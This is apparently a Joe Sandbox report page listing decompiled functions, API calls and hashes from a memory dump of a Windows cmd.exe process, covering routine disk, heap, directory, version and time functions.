0x001c2504
0x001c2505
0x001c2514
0x001c25a6
0x001cd62e
0x001cd62e
0x00000000
0x001c25ac
0x001c25b3
0x001c25bc
0x001c25c2
0x001c25c7
0x00000000
0x001c25cd
0x001cd619
0x001cd61e
0x001cd628
0x00000000
0x00000000
0x00000000
0x00000000
0x001cd628
0x001c25c7
0x001c2534
0x001c2538
0x001c2540
0x001c2542
0x001c2546
0x001c254c
0x00000000
0x001c2552
0x001c2554
0x001cd63a
0x001cd63c
0x001cd63f
0x001cd63f
0x001cd642
0x001cd645
0x001cd64e
0x001cd65d
0x001cd663
0x001cd667
0x001cd66a
0x001cd66a
0x001c255a
0x001c2566
0x001c256b
0x001c256f
0x001c2572
0x001c2585
0x001c2587
0x001c258c
0x001c2590
0x001c2593
0x001c2595
0x001c2595
0x001c2599
0x00000000
0x001c2599
0x00000000
0x001c251a
0x001c251a
0x001c251a
0x001c251a
0x001c251e
0x001c251e
0x001c2520
0x001c2524
0x001c2527
0x001c2527
0x001c252a
0x001c252d
0x00000000
0x001c2527
0x00000000
0x00000000
0x00000000
0x00000000
0x001c24bf
0x001c24bf
0x001c24c2
0x001c24c9
0x001c24c9
0x001c24ca
0x001c24d1
0x001c24d2
0x001c24d3
0x001c24de

APIs

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 001C24EC
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001C2505
memcpy.MSVCRT ref: 001C2566
_wcsnicmp.MSVCRT ref: 001C25BC
_wcsicmp.MSVCRT ref: 001CD61E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
String ID:
API String ID: 242869866-0
Opcode ID: 6932d595adb80f16c29e4e34f053aea255828e089edc67782e21369bd6e1aea6
Instruction ID: 8e2206624c4239e2a5e5273927c53ae54c81d3b31936231507174d8cc2c509cc
Opcode Fuzzy Hash: 6932d595adb80f16c29e4e34f053aea255828e089edc67782e21369bd6e1aea6
Instruction Fuzzy Hash: 4151BF756083118BC724DF28DC54AABB7E5EFE8710F15492EF899C3240EB30D946CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001DA0D2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E001DA0D2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				intOrPtr _v560;
				union _ULARGE_INTEGER _v564;
				union _ULARGE_INTEGER _v572;
				union _ULARGE_INTEGER _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				WCHAR* _t51;
				char _t60;
				WCHAR* _t69;
				void* _t77;
				void* _t78;
				void* _t79;
				signed int _t81;

				_t76 = __edx;
				_t35 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t35 ^ _t81;
				_t79 = __edx;
				_v552 = _a8;
				_t78 = __ecx;
				E001BB6B9(__ecx);
				_v28 = 0;
				_v20 = 0x104;
				_t60 = 1;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					E001C0D89(_t76, _t79);
					_t51 = _v28;
					_t69 = _t51;
					if(_t51 == 0) {
						_t69 =  &_v548;
					}
					if( *_t69 != 0 && _t69[1] == 0x3a && _t69[2] == 0) {
						E001C0CF2(_t76, "\\");
						_t51 = _v28;
					}
					_v560 = 0;
					_v564.LowPart = 0;
					if(_t51 == 0) {
						_t51 =  &_v548;
					}
					GetDiskFreeSpaceExW(_t51,  &_v564,  &_v580,  &_v572);
					_t77 = 6;
					E001D7A11(_t78, _t77);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t76 =  &_v564;
					E001DAC75(_a4,  &_v564, 0xe, _t54, _v20);
					_t79 = _v28;
					if(_t79 == 0) {
						_t79 =  &_v548;
					}
					E001C274C(0x1f3d00, 0x104, L"%5lu", _v552);
					_push(_t79);
					_t60 = E001D7C83(0x1f3d00, _t76, _t78, 0x2379, 2, 0x1f3d00);
				}
				__imp__??_V@YAXPAX@Z();
				return E001C6FD0(_t60, _t60, _v8 ^ _t81, _t76, _t78, _t79, _v28);
			}

0x001da0d2
0x001da0dd
0x001da0e4
0x001da0ed
0x001da0ef
0x001da0f5
0x001da0f7
0x001da105
0x001da110
0x001da113
0x001da115
0x001da118
0x001da141
0x001da14e
0x001da153
0x001da156
0x001da15a
0x001da15c
0x001da15c
0x001da167
0x001da181
0x001da186
0x001da186
0x001da189
0x001da18f
0x001da197
0x001da199
0x001da199
0x001da1b5
0x001da1bd
0x001da1c0
0x001da1c5
0x001da1ca
0x001da1cc
0x001da1cc
0x001da1d8
0x001da1e1
0x001da1e6
0x001da1eb
0x001da1ed
0x001da1ed
0x001da209
0x001da20e
0x001da220
0x001da220
0x001da225
0x001da23e

APIs

memset.MSVCRT ref: 001DA118

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 001DA1B5
??_V@YAXPAX@Z.MSVCRT ref: 001DA225

Strings

%5lu, xrefs: 001DA1FE

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$DiskFreeSpace
String ID: %5lu
API String ID: 2448137811-2100233843
Opcode ID: ed94e0c9a8411ac600b2ae72c338f7b74c118d29903ea4935046e8cb736006f5
Instruction ID: 19c446256bbf0a90c8a83838c3d604d80d802f7b1e64b8fa76f8db7b674176b7
Opcode Fuzzy Hash: ed94e0c9a8411ac600b2ae72c338f7b74c118d29903ea4935046e8cb736006f5
Instruction Fuzzy Hash: B4418472A00219ABDB25EBA4DC85EFEB7B8EF18304F44019EE505A7241E7749E85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001BAC30 Relevance: 6.1, APIs: 4, Instructions: 61
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001BAC30(void* __ecx) {
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				intOrPtr* _t18;
				short _t30;
				signed short _t32;
				void* _t38;
				void* _t42;

				if(__ecx != 0) {
					_t16 =  *(__ecx + 0x14);
					if(_t16 != 0) {
						_t16 = _t16 - 1;
						 *(__ecx + 0x14) = _t16;
						_t42 =  *(__ecx + 0x90 + _t16 * 4);
						 *(__ecx + 0x90 + _t16 * 4) =  *(__ecx + 0x90 + _t16 * 4) & 0x00000000;
						if(_t42 != 0) {
							_t41 =  *_t42;
							_t17 =  *( *_t42) & 0x0000ffff;
							if(_t17 >= 0x61) {
								__eflags = _t17 - 0x7a;
								if(__eflags > 0) {
									goto L4;
								}
								_t32 = _t17 + 0xffffffe0 & 0x0000ffff;
								L5:
								_t18 =  *0x1f3cb8;
								if(_t18 == 0) {
									_t18 = 0x1f3ab0;
								}
								if( *_t18 != _t32) {
									E001D93E2((_t32 & 0x0000ffff) - 0x40, _t38);
									_t41 =  *_t42;
								}
								E001C33FC(_t30, _t41, 1, _t41, _t42, 1);
								RtlFreeHeap(GetProcessHeap(), 0,  *_t42);
								E001BACFD( *((intOrPtr*)(_t42 + 4)));
								E001BACD5( *((intOrPtr*)(_t42 + 4)));
								 *0x1f3cc9 =  *((intOrPtr*)(_t42 + 8));
								 *0x1f3cc8 =  *((intOrPtr*)(_t42 + 9));
								return RtlFreeHeap(GetProcessHeap(), 0, _t42);
							}
							L4:
							_t32 = _t17;
							goto L5;
						}
					}
				}
				return _t16;
			}

0x001bac36
0x001bac3c
0x001bac41
0x001bac47
0x001bac48
0x001bac4b
0x001bac52
0x001bac5c
0x001bac5e
0x001bac60
0x001bac66
0x001d1204
0x001d1207
0x00000000
0x00000000
0x001d1210
0x001bac6e
0x001bac6e
0x001bac75
0x001bacce
0x001bacce
0x001bac7a
0x001d121e
0x001d1223
0x001d1223
0x001bac85
0x001bac95
0x001bac9e
0x001baca6
0x001bacae
0x001bacb9
0x00000000
0x001bacc5
0x001bac6c
0x001bac6c
0x00000000
0x001bac6c
0x001bac5c
0x001bac41
0x001baccd

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 001BAC8E
RtlFreeHeap.NTDLL(00000000), ref: 001BAC95
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 001BACBE
RtlFreeHeap.NTDLL(00000000), ref: 001BACC5

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 8d7f65e4c86958d4dd31ff7618779586d48c77ce12afc090ddf5e50846d48007
Instruction ID: 49c4e2d5de4215915ce11b69df492c57389c9c271b98aef24c345cd2e038837b
Opcode Fuzzy Hash: 8d7f65e4c86958d4dd31ff7618779586d48c77ce12afc090ddf5e50846d48007
Instruction Fuzzy Hash: 5D1108312042409BCB24AF78D8487B63FA1AF45320F644459F4D7C7752DB21D881C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 001C6FE3 Relevance: 6.0, APIs: 4, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001C6FE3(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x001c6fea
0x001c6ff3
0x001c700c

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001C7119,001B1000), ref: 001C6FEA
UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(001C7119,?,001C7119,001B1000), ref: 001C6FF3
GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,001C7119,001B1000), ref: 001C6FFE
TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,001C7119,001B1000), ref: 001C7005

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 29f5d459e46ed86b9d1bf012d23e064512380c7cb271f4a47136cd86778a0195
Instruction ID: f04f05c604c1dfdb3c01a8ba8cf12eaf692277d0039950815dacd9bbe6263103
Opcode Fuzzy Hash: 29f5d459e46ed86b9d1bf012d23e064512380c7cb271f4a47136cd86778a0195
Instruction Fuzzy Hash: 29D0E976184104BBDB007BE1EC0DBA93E2DEB84756F154410F719C6861DE7154D1CB65

Uniqueness

Uniqueness Score: -1.00%

Function 001D31DC Relevance: 4.8, APIs: 3, Instructions: 274
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E001D31DC(void* __ecx, long __edx, long _a4, intOrPtr _a8, signed short* _a12) {
				signed int _v8;
				char _v564;
				struct _WIN32_FIND_DATAW _v612;
				signed short* _v616;
				signed int _v620;
				signed int _v624;
				void* _v628;
				signed int _v632;
				short* _v636;
				intOrPtr* _v640;
				intOrPtr _v644;
				short* _v652;
				intOrPtr _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t71;
				intOrPtr _t83;
				WCHAR* _t87;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				short _t100;
				intOrPtr _t101;
				WCHAR* _t107;
				signed short* _t119;
				void* _t120;
				short* _t121;
				signed int _t123;
				intOrPtr _t124;
				signed int _t125;
				void* _t129;
				signed short* _t130;
				short* _t134;
				intOrPtr* _t137;
				WCHAR* _t142;
				char* _t146;
				char* _t147;
				short* _t148;
				intOrPtr* _t149;
				WCHAR* _t157;
				intOrPtr* _t162;
				WCHAR* _t168;
				signed int _t170;
				void* _t177;
				signed short* _t178;
				short* _t179;
				signed int _t180;
				void* _t181;
				signed int _t183;
				signed int _t185;
				void* _t186;
				WCHAR* _t189;
				intOrPtr* _t191;
				signed int _t192;

				_t194 = (_t192 & 0xfffffff8) - 0x274;
				_t65 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t65 ^ (_t192 & 0xfffffff8) - 0x00000274;
				_v612.ftCreationTime.dwFileAttributes = __edx;
				_t162 = __ecx;
				_t119 = _a12;
				_v612.dwFileAttributes = _a4;
				_v628 = __ecx;
				_t7 = _t162 + 2; // 0x2
				_t129 = _t7;
				_v616 = _t119;
				_t185 = 0;
				do {
					_t68 =  *_t162;
					_t162 = _t162 + 2;
				} while (_t68 != 0);
				_t130 = _t119;
				_t164 = _t162 - _t129 >> 1;
				if( *_t119 == 0) {
					L53:
					_t69 = 0;
				} else {
					do {
						_t178 = _t130;
						do {
							_t71 =  *_t130 & 0x0000ffff;
							_t130 =  &(_t130[1]);
						} while (_t71 != 0);
						_t185 = _t185 + (_t130 - _t178 >> 1) + _t164;
					} while ( *_t130 != 0);
					if(0 == _t185) {
						goto L53;
					} else {
						_t9 = _t185 + 1; // 0x1
						_t187 = _t9 & 0x0000ffff;
						_v624 = _t9 & 0x0000ffff;
						_t179 = E001C00B0(_t187 + _t187);
						if(_t179 != 0) {
							_t134 = 0;
							_v632 = _t119;
							_t121 = _t179;
							if( *_v616 != 0) {
								do {
									E001C1040(_t121, _t187 - (_t121 - _t179 >> 1), _v628);
									E001C18C0(_t121, _t187 - (_t121 - _t179 >> 1), _v636);
									_t191 = E001BD7E6(_v640);
									_t134 = _t121;
									_v640 = _t191;
									_t121 = E001BD7E6(_t134);
									_t187 = _v632;
								} while ( *_t191 != 0);
							}
							_push(_t134);
							 *_t121 = 0;
							_v644 = E001B7EEC(_t121, _v612.ftCreationTime.dwFileAttributes, _v612.dwFileAttributes, _a8, _t179);
							E001C0040(_t179);
							_t122 = _v640;
							_t137 = _v640;
							_t24 = _t137 + 2; // 0x2
							_t164 = _t24;
							do {
								_t83 =  *_t137;
								_t137 = _t137 + 2;
							} while (_t83 != 0);
							_t25 = (_t137 - _t164 >> 1) + 2; // 0x0
							_t180 = _t25;
							_v624 = _t180;
							_t189 = E001C00B0(_t180 + _t180);
							if(_t189 == 0) {
								goto L8;
							} else {
								E001C1040(_t189, _t180, _t122);
								_t87 = _t189;
								_t142 = _t189;
								if( *_t189 != 0) {
									do {
										_t142 = _t87;
										_t87 =  &(_t87[1]);
									} while ( *_t87 != 0);
								}
								_t28 =  &(_t142[1]); // 0x2
								_t164 = _t180;
								_v632 = _t28;
								E001C18C0(_t189, _t180, "*");
								_t123 = FindFirstFileW(_t189,  &_v612);
								_v632 = _t123;
								 *_v636 = 0;
								if(_t123 == 0xffffffff) {
									_t124 = _v636;
								} else {
									do {
										if((_v612.ftCreationTime.dwFileAttributes & 0x00000010) == 0) {
											L46:
											_t124 = _v636;
											goto L47;
										} else {
											_t146 = ".";
											_t96 =  &_v564;
											while(1) {
												_t164 =  *_t96;
												if(_t164 !=  *_t146) {
													break;
												}
												if(_t164 == 0) {
													L23:
													_t125 = 0;
													_t97 = 0;
												} else {
													_t164 =  *((intOrPtr*)(_t96 + 2));
													_t38 =  &(_t146[2]); // 0x200000
													if(_t164 !=  *_t38) {
														break;
													} else {
														_t96 = _t96 + 4;
														_t146 =  &(_t146[4]);
														if(_t164 != 0) {
															continue;
														} else {
															goto L23;
														}
													}
												}
												L25:
												if(_t97 == 0) {
													goto L46;
												} else {
													_t147 = L"..";
													_t98 =  &_v564;
													while(1) {
														_t164 =  *_t98;
														if(_t164 !=  *_t147) {
															break;
														}
														if(_t164 == 0) {
															L31:
															_t99 = _t125;
														} else {
															_t164 =  *((intOrPtr*)(_t98 + 2));
															_t41 =  &(_t147[2]); // 0x2e
															if(_t164 !=  *_t41) {
																break;
															} else {
																_t98 = _t98 + 4;
																_t147 =  &(_t147[4]);
																if(_t164 != 0) {
																	continue;
																} else {
																	goto L31;
																}
															}
														}
														L33:
														if(_t99 == 0) {
															goto L46;
														} else {
															_t168 = _t189;
															_t42 =  &(_t168[1]); // 0x2
															_t148 = _t42;
															do {
																_t100 =  *_t168;
																_t168 =  &(_t168[1]);
															} while (_t100 != _t125);
															_t149 =  &_v564;
															_t170 = _t168 - _t148 >> 1;
															_t181 = _t149 + 2;
															do {
																_t101 =  *_t149;
																_t149 = _t149 + 2;
															} while (_t101 != _t125);
															_t45 = _t170 + 2; // 0x0
															_t183 = _t45 + (_t149 - _t181 >> 1);
															if(_t183 <= _v624) {
																_t183 = _v624;
																goto L45;
															} else {
																_t164 = _t183 + _t183;
																_t107 = E001C0100(_t189, _t183 + _t183);
																if(_t107 == 0) {
																	_t124 = 1;
																} else {
																	_t189 = _t107;
																	_v624 = _t183;
																	_t157 = _t107;
																	while( *_t107 != _t125) {
																		_t157 = _t107;
																		_t107 =  &(_t107[1]);
																	}
																	_t49 =  &(_t157[1]); // 0x2
																	_v632 = _t49;
																	L45:
																	E001C18C0(_t189, _t183,  &_v564);
																	E001C18C0(_t189, _t183, "\\");
																	_t164 = _v620;
																	_t124 = E001D31DC(_t189, _v620, _v624, _a8, _v628);
																	_v656 = _t124;
																	 *_v652 = 0;
																	goto L47;
																}
															}
														}
														goto L50;
													}
													asm("sbb eax, eax");
													_t99 = _t98 | 0x00000001;
													goto L33;
												}
												goto L50;
											}
											asm("sbb eax, eax");
											_t97 = _t96 | 0x00000001;
											_t125 = 0;
											goto L25;
										}
										L50:
										FindClose(_v628);
										goto L52;
										L47:
									} while (FindNextFileW(_v628,  &(_v612.ftCreationTime)) != 0);
									goto L50;
								}
								L52:
								E001C0040(_t189);
								_t69 = _t124;
							}
						} else {
							L8:
							_t69 = 1;
						}
					}
				}
				_pop(_t177);
				_pop(_t186);
				_pop(_t120);
				return E001C6FD0(_t69, _t120, _v8 ^ _t194, _t164, _t177, _t186);
			}

0x001d31e4
0x001d31ea
0x001d31f1
0x001d31fa
0x001d3201
0x001d3204
0x001d320b
0x001d320f
0x001d3213
0x001d3213
0x001d3216
0x001d321a
0x001d321c
0x001d321c
0x001d321f
0x001d3222
0x001d3229
0x001d322b
0x001d3230
0x001d34ed
0x001d34ed
0x001d3236
0x001d3236
0x001d3236
0x001d3238
0x001d3238
0x001d323b
0x001d323e
0x001d324b
0x001d324f
0x001d3257
0x00000000
0x001d325d
0x001d325d
0x001d3260
0x001d3263
0x001d326f
0x001d3273
0x001d3281
0x001d3283
0x001d3287
0x001d328c
0x001d328e
0x001d329e
0x001d32ab
0x001d32b9
0x001d32bb
0x001d32bd
0x001d32c6
0x001d32cd
0x001d32cd
0x001d328e
0x001d32d9
0x001d32e2
0x001d32ec
0x001d32f0
0x001d32f5
0x001d32fb
0x001d32fd
0x001d32fd
0x001d3300
0x001d3300
0x001d3303
0x001d3306
0x001d330f
0x001d330f
0x001d3315
0x001d331e
0x001d3322
0x00000000
0x001d3328
0x001d332d
0x001d3334
0x001d3336
0x001d333b
0x001d333d
0x001d333d
0x001d333f
0x001d3342
0x001d333d
0x001d3347
0x001d334a
0x001d3353
0x001d3357
0x001d3368
0x001d3370
0x001d3374
0x001d337a
0x001d34de
0x001d3380
0x001d3380
0x001d3385
0x001d34b2
0x001d34b2
0x00000000
0x001d338b
0x001d338b
0x001d3390
0x001d3394
0x001d3394
0x001d339a
0x00000000
0x00000000
0x001d339f
0x001d33b6
0x001d33b6
0x001d33b8
0x001d33a1
0x001d33a1
0x001d33a5
0x001d33a9
0x00000000
0x001d33ab
0x001d33ab
0x001d33ae
0x001d33b4
0x00000000
0x00000000
0x00000000
0x00000000
0x001d33b4
0x001d33a9
0x001d33c3
0x001d33c5
0x00000000
0x001d33cb
0x001d33cb
0x001d33d0
0x001d33d4
0x001d33d4
0x001d33da
0x00000000
0x00000000
0x001d33df
0x001d33f6
0x001d33f6
0x001d33e1
0x001d33e1
0x001d33e5
0x001d33e9
0x00000000
0x001d33eb
0x001d33eb
0x001d33ee
0x001d33f4
0x00000000
0x00000000
0x00000000
0x00000000
0x001d33f4
0x001d33e9
0x001d33ff
0x001d3401
0x00000000
0x001d3407
0x001d3407
0x001d3409
0x001d3409
0x001d340c
0x001d340c
0x001d340f
0x001d3412
0x001d3419
0x001d341d
0x001d341f
0x001d3422
0x001d3422
0x001d3425
0x001d3428
0x001d342f
0x001d3434
0x001d343a
0x001d346b
0x00000000
0x001d343c
0x001d343c
0x001d3441
0x001d3448
0x001d34d1
0x001d344e
0x001d344e
0x001d3450
0x001d3454
0x001d345d
0x001d3458
0x001d345a
0x001d345a
0x001d3462
0x001d3465
0x001d346f
0x001d3478
0x001d3486
0x001d348f
0x001d34a1
0x001d34a9
0x001d34ad
0x00000000
0x001d34ad
0x001d3448
0x001d343a
0x00000000
0x001d3401
0x001d33fa
0x001d33fc
0x00000000
0x001d33fc
0x00000000
0x001d33c5
0x001d33bc
0x001d33be
0x001d33c1
0x00000000
0x001d33c1
0x001d34d2
0x001d34d6
0x00000000
0x001d34b6
0x001d34c5
0x00000000
0x001d34cd
0x001d34e2
0x001d34e4
0x001d34e9
0x001d34e9
0x001d3275
0x001d3275
0x001d3277
0x001d3277
0x001d3273
0x001d3257
0x001d34f6
0x001d34f7
0x001d34f8
0x001d3503

APIs

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,001B250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001D3362
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 001D34BF
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001D34D6

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 4e37fa3e97d7c29b3cf9c62cc93ac8b1eb51842c203798fefb4aeef54727885d
Instruction ID: df910e2384cbd2e15d8a28d4fc878247c11fb89b6435fcc25a36fe8967e22d95
Opcode Fuzzy Hash: 4e37fa3e97d7c29b3cf9c62cc93ac8b1eb51842c203798fefb4aeef54727885d
Instruction Fuzzy Hash: CE91F6357042019BCB29EF28C85166BB3E2FFE8344B45892EE865C7350EB35DE46C792

Uniqueness

Uniqueness Score: -1.00%

Function 001B443C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E001B443C(void* __ecx) {
				signed char _t5;
				void* _t12;

				_t12 = __ecx;
				_t5 = GetVersion();
				_push(E001B4476());
				_push(_t5 >> 0x10);
				_push(_t5 >> 0x00000008 & 0x000000ff);
				return E001C274C(_t12, 0x20, L"%d.%d.%05d.%d", _t5 & 0x000000ff);
			}

0x001b4440
0x001b4448
0x001b444f
0x001b445a
0x001b4461
0x001b4475

APIs

GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,001D731D,?,?,?,?,?), ref: 001B4442

Part of subcall function 001B4476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 001B449A
Part of subcall function 001B4476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 001B44BE
Part of subcall function 001B4476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001B44C9

Strings

%d.%d.%05d.%d, xrefs: 001B4463

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseOpenQueryValueVersion
String ID: %d.%d.%05d.%d
API String ID: 2996790148-3457777122
Opcode ID: b2cdcb79a90b44c88324a194d2efb49df7ec602ce846d8e2b2849c1889112f75
Instruction ID: a59439381821ac51d9ecaa8a91ae9ed352cd8c0468f221664f1bb1a99bc0f808
Opcode Fuzzy Hash: b2cdcb79a90b44c88324a194d2efb49df7ec602ce846d8e2b2849c1889112f75
Instruction Fuzzy Hash: 25D05BB275122037D614656E5C9AFBB608DC7E8151744812EF901962C6DBB9AC2581B4

Uniqueness

Uniqueness Score: -1.00%

Function 001D3C49 Relevance: 3.0, APIs: 2, Instructions: 43
timeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E001D3C49(intOrPtr* __ecx, struct _FILETIME* __edx) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				void* __esi;
				signed int _t19;
				void* _t34;
				void* _t39;
				struct _FILETIME* _t40;
				signed int _t41;

				_t38 = __edx;
				_t19 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t19 ^ _t41;
				_t40 = __edx;
				if(__ecx != 0) {
					_v24.wYear =  *((intOrPtr*)(__ecx + 0x14));
					_v24.wMonth =  *((intOrPtr*)(__ecx + 0x10)) + 1;
					_v24.wDay =  *((intOrPtr*)(__ecx + 0xc));
					_v24.wHour =  *((intOrPtr*)(__ecx + 8));
					_v24.wMinute =  *((intOrPtr*)(__ecx + 4));
					_v24.wSecond =  *((intOrPtr*)(__ecx));
					_v24.wDayOfWeek =  *((intOrPtr*)(__ecx + 0x18));
					_v24.wMilliseconds = 0;
				} else {
					GetSystemTime( &_v24);
				}
				return E001C6FD0(SystemTimeToFileTime( &_v24, _t40), _t34, _v8 ^ _t41, _t38, _t39, _t40);
			}

0x001d3c49
0x001d3c51
0x001d3c58
0x001d3c5c
0x001d3c60
0x001d3c72
0x001d3c7c
0x001d3c84
0x001d3c8c
0x001d3c94
0x001d3c9b
0x001d3ca3
0x001d3ca9
0x001d3c62
0x001d3c66
0x001d3c66
0x001d3cc6

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,?,001C9AFE,001DF830,?,00002000), ref: 001D3C66
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,00000000,?,001C9AFE,001DF830,?,00002000), ref: 001D3CB2

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Time$System$File
String ID:
API String ID: 2838179519-0
Opcode ID: 639e617a9bf77878cd6795961b94a1d5ad81ba128fe92fcd42617ba2a5fb923b
Instruction ID: 5dfab619703331df725c754b930587c2c4701894d0a8ec39310cf90eb6fdffb9
Opcode Fuzzy Hash: 639e617a9bf77878cd6795961b94a1d5ad81ba128fe92fcd42617ba2a5fb923b
Instruction Fuzzy Hash: 0901002C911249AACB04EFE4D5445FEB774EF58704B20509EEC19E7711E7319E43C76A

Uniqueness

Uniqueness Score: -1.00%

Function 001D2258 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,001D2418), ref: 001D228B

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
